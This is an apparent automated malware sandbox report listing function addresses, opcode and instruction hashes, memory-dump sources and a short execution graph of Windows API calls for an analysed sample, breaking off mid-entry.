                                                                  • Instruction ID: 1fb5ecc139e6952c30e8ba01377716c6280cb855312ff545e6371ce8a2a85661
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 33C04C345558098FC948FB29C98591477A0FB19325BD60190E409CB1B1D759DCD5C745
                                                                  Function 00007FF848F10B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000028.00000002.2301609620.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_40_2_7ff848f10000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 51573c83aac1846bbca837130c15ea9e70de8e1f841a1e536e2981642cb3538d
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: A5C08C305108088FC900F72CC88480072A0FB0D310BC10090E00ECB2B0E31A9C80C700
                                                                  Function 00007FF848F15E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000028.00000002.2301609620.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_40_2_7ff848f10000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f46cfffb406ba06fe3476a5ff8f839ce50785bc8dcda25eb04d36716af1d8329
                                                                  • Instruction ID: 7879cb71d37018255b47bd5ad5951e2199fe97ee3d3571b02ee2210aa26fbb8a
                                                                  • Opcode Fuzzy Hash: f46cfffb406ba06fe3476a5ff8f839ce50785bc8dcda25eb04d36716af1d8329
                                                                  • Instruction Fuzzy Hash: 40C04C16F2BC1A9AF2A6631450212BE48579F84748F946075E40E873CACF4D5F41828F
                                                                  Function 00007FF848F106C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000028.00000002.2301609620.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_40_2_7ff848f10000_apERZQztEJsqymITPFxguVe.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: 2f1a5e52f775f867b58c9a59c602190bf2d901c60125e77e7b5c4922becc21b6
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 32B01210C6E40F04E404337A084206570405B88340FC40070D80C401C19A4D18D4068A

                                                                  Execution Graph

                                                                  Execution Coverage:5.2%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:29
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 38959 7ff848f52afd 38960 7ff848f6ebb0 38959->38960 38963 7ff848f52cf0 38960->38963 38965 7ff848f52cf9 CreateFileTransactedW 38963->38965 38966 7ff848f5734a 38965->38966 38971 7ff848f5451a 38972 7ff848f544f9 38971->38972 38973 7ff848f54502 38972->38973 38973->38972 38975 7ff848f52d20 CreateFileTransactedW 38973->38975 38975->38973 38990 7ff848f52dc5 38991 7ff848f52d5b CloseHandle 38990->38991 38994 7ff848f52dca 38990->38994 38993 7ff848f6ea94 38991->38993 38980 7ff848f544a7 38985 7ff848f52d30 38980->38985 38982 7ff848f544d9 38984 7ff848f54502 38982->38984 38984->38982 38989 7ff848f52d20 CreateFileTransactedW 38984->38989 38986 7ff848f52d39 CreateFileTransactedW 38985->38986 38988 7ff848f5734a 38986->38988 38988->38982 38989->38984 38976 7ff848f59e31 38977 7ff848f59e84 VirtualAlloc 38976->38977 38979 7ff848f59ee8 38977->38979 38967 7ff848f57411 38969 7ff848f5742f WriteFile 38967->38969 38970 7ff848f574f7 38969->38970 38995 7ff848f595d0 38996 7ff848f596cf GetSystemInfo 38995->38996 38998 7ff848f5976e 38996->38998

                                                                  Executed Functions

                                                                  Function 00007FF8492D195F Relevance: 2.0, Strings: 1, Instructions: 707COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: C+I
                                                                  • API String ID: 0-552810162
                                                                  • Opcode ID: c36db586a78045eb98dec8e04050b598cdd725e91a0553040134a7cd330a0861
                                                                  • Instruction ID: 4b8cb42a6890dc245a66e9c75eeb90a794d1b267bf658ba68002adb410cfdd20
                                                                  • Opcode Fuzzy Hash: c36db586a78045eb98dec8e04050b598cdd725e91a0553040134a7cd330a0861
                                                                  • Instruction Fuzzy Hash: 4742B13091D6A98FEB6DEF18C4A0AB877B1FF55340F1042BDC45AD7686CB78A981CB41
                                                                  Function 00007FF8492D16E8 Relevance: 3.9, Strings: 3, Instructions: 157COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 181 7ff8492d16e8-7ff8492d1700 183 7ff8492d1708-7ff8492d1733 181->183 187 7ff8492d175c-7ff8492d1762 183->187 188 7ff8492d1769-7ff8492d176f 187->188 189 7ff8492d1735-7ff8492d174e 188->189 190 7ff8492d1771-7ff8492d1776 188->190 193 7ff8492d1754-7ff8492d1759 189->193 194 7ff8492d1845-7ff8492d1855 189->194 191 7ff8492d1663-7ff8492d16a8 190->191 192 7ff8492d177c-7ff8492d17b1 190->192 191->188 198 7ff8492d16ae-7ff8492d16b4 191->198 193->187 200 7ff8492d1857 194->200 201 7ff8492d1858-7ff8492d18a6 194->201 202 7ff8492d1665-7ff8492d183d 198->202 203 7ff8492d16b6 198->203 200->201 202->194 206 7ff8492d16df-7ff8492d16e6 203->206 206->181 207 7ff8492d16b8-7ff8492d16d1 206->207 207->194 210 7ff8492d16d7-7ff8492d16dc 207->210 210->206
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $0>+I$0>+I
                                                                  • API String ID: 0-1675204460
                                                                  • Opcode ID: 6ae916ae00654db39a89d75ec2fb45cc5069afa580ca886d32a03a46bb1572ea
                                                                  • Instruction ID: e14d0dc9c0dd30699848c86b7321d905e6fb3a027fbe67314a05bf618ea3ac96
                                                                  • Opcode Fuzzy Hash: 6ae916ae00654db39a89d75ec2fb45cc5069afa580ca886d32a03a46bb1572ea
                                                                  • Instruction Fuzzy Hash: EC515730D0869A9FEB6DEF98D4509BDB7B1FF48340F1442BAC01AE7682CA786901CB50
                                                                  Function 00007FF8492DEE47 Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: X<<I$X<<I
                                                                  • API String ID: 0-3507427270
                                                                  • Opcode ID: 3a54ba01dc4e0991b339ead55ed6c326d1ffaaa19e25314ac3363decdc90eea5
                                                                  • Instruction ID: 8cd5c5dfbf177493604fb4cc2c4aea1d56ef3d425b2f0f16fbc0a45562024668
                                                                  • Opcode Fuzzy Hash: 3a54ba01dc4e0991b339ead55ed6c326d1ffaaa19e25314ac3363decdc90eea5
                                                                  • Instruction Fuzzy Hash: 8B212712DAF6F39EF2757A2834511F96B49BF513A6F2803BAC06D470C6DC8C288553DA
                                                                  Function 00007FF8492DC0E1 Relevance: 1.7, Strings: 1, Instructions: 427COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Xo-I
                                                                  • API String ID: 0-1130157975
                                                                  • Opcode ID: e9925c4c0e850a14c8f4573005f18f7cddb3bca86d0aced4e8e68b49b92b03d5
                                                                  • Instruction ID: 87ed5ba1e94ac7cf4f5d511f5959d1c56c9852eed413576b1cb1190e92d63abf
                                                                  • Opcode Fuzzy Hash: e9925c4c0e850a14c8f4573005f18f7cddb3bca86d0aced4e8e68b49b92b03d5
                                                                  • Instruction Fuzzy Hash: 89E1033090DBA68FF378EF28D49557577E5FF45340B24067EC0AAC3686DEA8B8468781
                                                                  Function 00007FF8492D1212 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0>+I
                                                                  • API String ID: 0-2263542650
                                                                  • Opcode ID: c3419f97221eef56a2a8820d7f990ff19fe138230399a6ccad9a85c6c93d7895
                                                                  • Instruction ID: 4f735719ed971c0775283fc53c5e047fea9b41ca5ce56e2b8a0c0d95319dfe55
                                                                  • Opcode Fuzzy Hash: c3419f97221eef56a2a8820d7f990ff19fe138230399a6ccad9a85c6c93d7895
                                                                  • Instruction Fuzzy Hash: F1617D30A189965FF798EF28D095AA5B7A5FF58340F508239C01EC7E86DF78F8518B84
                                                                  Function 00007FF8492DAE28 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: b8b89c560e63beecb6c6dd7eb6c23beeb374a84136420eb990c7749ec23cf0f0
                                                                  • Instruction ID: 72b25deb1da70c8352d69422d89fd7985a961b97477899ead66125d0d3c41b32
                                                                  • Opcode Fuzzy Hash: b8b89c560e63beecb6c6dd7eb6c23beeb374a84136420eb990c7749ec23cf0f0
                                                                  • Instruction Fuzzy Hash: 4F514070D0C69AAFEB59EF98D4509BDB7B5FF95340F1042BAC01AE7286CB786901CB50
                                                                  Function 00007FF8492D012D Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: H;+I
                                                                  • API String ID: 0-782934498
                                                                  • Opcode ID: 62fc69ab469f95991ebaf0214fb66affee2194e0fe395f347e14a63dde3d118f
                                                                  • Instruction ID: 33de8003f39acca7e8e00608014a872330e2a02b22f0028bdd4e64e2a4bb26d0
                                                                  • Opcode Fuzzy Hash: 62fc69ab469f95991ebaf0214fb66affee2194e0fe395f347e14a63dde3d118f
                                                                  • Instruction Fuzzy Hash: DE318131E0C95A5FE758EF5CE491AA8F7E2FF45350B14427AC01ED3292DF24B8528B84
                                                                  Function 00007FF8492DB0BF Relevance: .3, Instructions: 336COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f90af1b92589782c72d7b153351ed644510201ae744fb2ac758d7cf8fb560b7
                                                                  • Instruction ID: 511b27d5543a814e556b8050b073e1fda7d2b18d6e1e94dd84638ef7c3acd0da
                                                                  • Opcode Fuzzy Hash: 7f90af1b92589782c72d7b153351ed644510201ae744fb2ac758d7cf8fb560b7
                                                                  • Instruction Fuzzy Hash: 11C1E33091D5A68FEBA9DF04C0E45B537A5FF45350B5446BDC86B8B68BCA78F482CB80
                                                                  Function 00007FF8492DE4F2 Relevance: .3, Instructions: 319COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c6f9f61cd37e5a38b25122a09ef4e8b197ec1ab32008ffbe1880d4d8c68bf11
                                                                  • Instruction ID: 1a60a87300d3653e6b60b68b0e70043ac58048bc02e64575e3ad1c65feb2690f
                                                                  • Opcode Fuzzy Hash: 4c6f9f61cd37e5a38b25122a09ef4e8b197ec1ab32008ffbe1880d4d8c68bf11
                                                                  • Instruction Fuzzy Hash: 37A19B22C1F6D6AFE791FB7CA8A55E77F70EF0129CB0802B7D0984E093DE1C64458269
                                                                  Function 00007FF8492D8327 Relevance: .3, Instructions: 308COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84e7bb47730b05626b5eabd456b217af1774938e5fdeeec34527c7393f2edabc
                                                                  • Instruction ID: 57931dcd10f63056078effae04fe455bd2163c1eb6cd3f5680b8f63c1bf088d5
                                                                  • Opcode Fuzzy Hash: 84e7bb47730b05626b5eabd456b217af1774938e5fdeeec34527c7393f2edabc
                                                                  • Instruction Fuzzy Hash: B821A516D0D5F7DFF6757A6C28120FC1B78AF556A4F1A07BAC15D8A0C3CC8C28855392
                                                                  Function 00007FF8492DB09F Relevance: .3, Instructions: 298COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 797bd6ff2dfb16be3729d723d58e3a25956945c1e4c52f31ff833edb2c534922
                                                                  • Instruction ID: 97fbdae7f1333faed5583f4c65b09ae8af5763cd54fbf74c29657350552224b6
                                                                  • Opcode Fuzzy Hash: 797bd6ff2dfb16be3729d723d58e3a25956945c1e4c52f31ff833edb2c534922
                                                                  • Instruction Fuzzy Hash: 82B1C3305196568FEB99DF08C4E46B53BA5FF49310B5442BDC85B8B68BC778F882CB81
                                                                  Function 00007FF8492DEAF9 Relevance: .3, Instructions: 253COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ede55c25495b276da0e197acfe6311325a99e78076a9de4f671e2e182b60c74c
                                                                  • Instruction ID: 1e3d4c3cd309740ad69d6aa1a704262b2bd634a19e2d6b373c775f9940b39922
                                                                  • Opcode Fuzzy Hash: ede55c25495b276da0e197acfe6311325a99e78076a9de4f671e2e182b60c74c
                                                                  • Instruction Fuzzy Hash: F071227190C9D98FF7B8FE18885A5F937C4FF44351B0403BDD0AEC75A2DA58A8068781
                                                                  Function 00007FF8492D9E96 Relevance: .2, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 340c498cdf062c18194e98026404a36d0f7c4d43db6b577d4a046b3d1d0b8784
                                                                  • Instruction ID: 6f7541c4580594c7d049e066ab05c48e591fbfe123abeb2f194a9854e401345d
                                                                  • Opcode Fuzzy Hash: 340c498cdf062c18194e98026404a36d0f7c4d43db6b577d4a046b3d1d0b8784
                                                                  • Instruction Fuzzy Hash: 9F71593191EBE25FF3396E28A4419757BE4EF86391B14067EE09EC3183DE5D78068392
                                                                  Function 00007FF8492D8002 Relevance: .2, Instructions: 216COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ca9bcc5b44556b99e49315f654f5db6c94a28d72da7c62a341b647bdf3395d40
                                                                  • Instruction ID: a7343a0aa624de166caed4fc0855959ab48e38cdeca800cf494b6ac0af85c148
                                                                  • Opcode Fuzzy Hash: ca9bcc5b44556b99e49315f654f5db6c94a28d72da7c62a341b647bdf3395d40
                                                                  • Instruction Fuzzy Hash: B861363190D4D94FF778FE1888569B937D4FF88351B1403B9D0AEC75A2DEA8E80A8781
                                                                  Function 00007FF8492DAAAE Relevance: .2, Instructions: 211COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8109e4b5ce8321c3be3e23f20ab0f2f4c4a07611fa14f3b207ad37bacd906ce5
                                                                  • Instruction ID: bfc11d665636c536bcc37595581faf3208cecff819bcd17b718d2a8294b16668
                                                                  • Opcode Fuzzy Hash: 8109e4b5ce8321c3be3e23f20ab0f2f4c4a07611fa14f3b207ad37bacd906ce5
                                                                  • Instruction Fuzzy Hash: 8971353090DAC6AFF35AEF28C4909A0BBA5FF55310F4442B9C05AC7A83DB68B851C791
                                                                  Function 00007FF8492DE6F2 Relevance: .2, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b30a5f463de0c35b61e13f9ce0fd05618249998a3d2604f3dcfa90cc8874bbb
                                                                  • Instruction ID: 9b181d1dac3c05e346021167431b6dcfde3a5eeafcf5b940a6b9ffb942fa93de
                                                                  • Opcode Fuzzy Hash: 0b30a5f463de0c35b61e13f9ce0fd05618249998a3d2604f3dcfa90cc8874bbb
                                                                  • Instruction Fuzzy Hash: B051D732C0E6DA9FE795EB68A8A55EA7F70FF01258B1802B7D048CB193DE1C68468355
                                                                  Function 00007FF8492DE6D7 Relevance: .2, Instructions: 154COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 77eb30e21b5e97d34819cfc8ae7054cdb6b3be5298faefefe42275c9be8f25da
                                                                  • Instruction ID: c37c113c02a152869451ff3cce74bcabebadf598df62e40a4cd3c1cdd2df314c
                                                                  • Opcode Fuzzy Hash: 77eb30e21b5e97d34819cfc8ae7054cdb6b3be5298faefefe42275c9be8f25da
                                                                  • Instruction Fuzzy Hash: 6E51D732C0E6D99FE795EB68E8A55EA3F70FF01258F0802B7D048CB193DE1C68068355
                                                                  Function 00007FF8492DB430 Relevance: .1, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fd239d851bf34d0927c130585aec9fd437b15bf9faae4c6ea0c7d2223c76a10
                                                                  • Instruction ID: d7b421026b58e25cdf3a4228c6bf2f5a7f30a49db785949bfc97f65ac94e8ecc
                                                                  • Opcode Fuzzy Hash: 9fd239d851bf34d0927c130585aec9fd437b15bf9faae4c6ea0c7d2223c76a10
                                                                  • Instruction Fuzzy Hash: 0041F130D1C9AA8EFBB8EA1884747B5B7A5FF55300F5442BAC05EC7582DE7869888B41
                                                                  Function 00007FF8492D1CF0 Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89971762aa3c473a2dd7c69d397be73aa6869f28d779bd0e629bdfb2d0c85c1c
                                                                  • Instruction ID: a0c8f23ba24527e160ce24c2ccb03b2ccfaf466ab64fcf4242743c1948dd052d
                                                                  • Opcode Fuzzy Hash: 89971762aa3c473a2dd7c69d397be73aa6869f28d779bd0e629bdfb2d0c85c1c
                                                                  • Instruction Fuzzy Hash: 0941E220D1C5AA8EF7BDFA188460AB877A1FF95340F1442B9C05EE75C7CB7869858740
                                                                  Function 00007FF8492DC707 Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ce22f015a316602b13895e6abcb0836cd4ab4d6ddb28c8bfb0fe0a5ba9aa8e0
                                                                  • Instruction ID: 6a7560ae47a18fc1f38b67d360b9f8763deab24caecbbb8adc4452e7042e5df4
                                                                  • Opcode Fuzzy Hash: 6ce22f015a316602b13895e6abcb0836cd4ab4d6ddb28c8bfb0fe0a5ba9aa8e0
                                                                  • Instruction Fuzzy Hash: 8841F83160C9598FEB58EF1CD455DA577E0FBA9321B0442AAD10EC3292DF34E841CB81
                                                                  Function 00007FF8492D0856 Relevance: .1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 26ca9a40fe437f70aee833a3aa08905c7409b05f202780ee9c911b0ebfeb36c3
                                                                  • Instruction ID: a46ecfc092f528737e06c60bad6511e71b47714f755397bcad295735d372210a
                                                                  • Opcode Fuzzy Hash: 26ca9a40fe437f70aee833a3aa08905c7409b05f202780ee9c911b0ebfeb36c3
                                                                  • Instruction Fuzzy Hash: 8C315B2198D7D14FF3396E28685507A7FE8DF46790B1406BEE0DEC31A3D95878068392
                                                                  Function 00007FF8492DC6C3 Relevance: .1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d696bf0b87c566d081c7c9f4754f6fb207f357371ba3a6cb8f7ccb0c1d4d0c1
                                                                  • Instruction ID: e6224c997c372341b99be4fc52f281988d066548373acf1f76fe4d74466b40ab
                                                                  • Opcode Fuzzy Hash: 1d696bf0b87c566d081c7c9f4754f6fb207f357371ba3a6cb8f7ccb0c1d4d0c1
                                                                  • Instruction Fuzzy Hash: F641E431A0C9598FEBA9EF2CC4559A577E1FFA9310B1442A9D00EC7692CF34F841CB81
                                                                  Function 00007FF8492D3071 Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8cf3286153adb9a578113c5d5286c45c86797fb8e216836ae34ad980f4744fc0
                                                                  • Instruction ID: fceec597fc191581d0b6cf9cf73a1a885bab491891a032fede964c392caea765
                                                                  • Opcode Fuzzy Hash: 8cf3286153adb9a578113c5d5286c45c86797fb8e216836ae34ad980f4744fc0
                                                                  • Instruction Fuzzy Hash: 11319131A0C9698FDB99FF28C495EA573E1FBA931470406EDD04EC7192DE28EC85CB91
                                                                  Function 00007FF8492D300B Relevance: .1, Instructions: 115COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000029.00000002.3380171096.00007FF8492D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8492D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_41_2_7ff8492d0000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
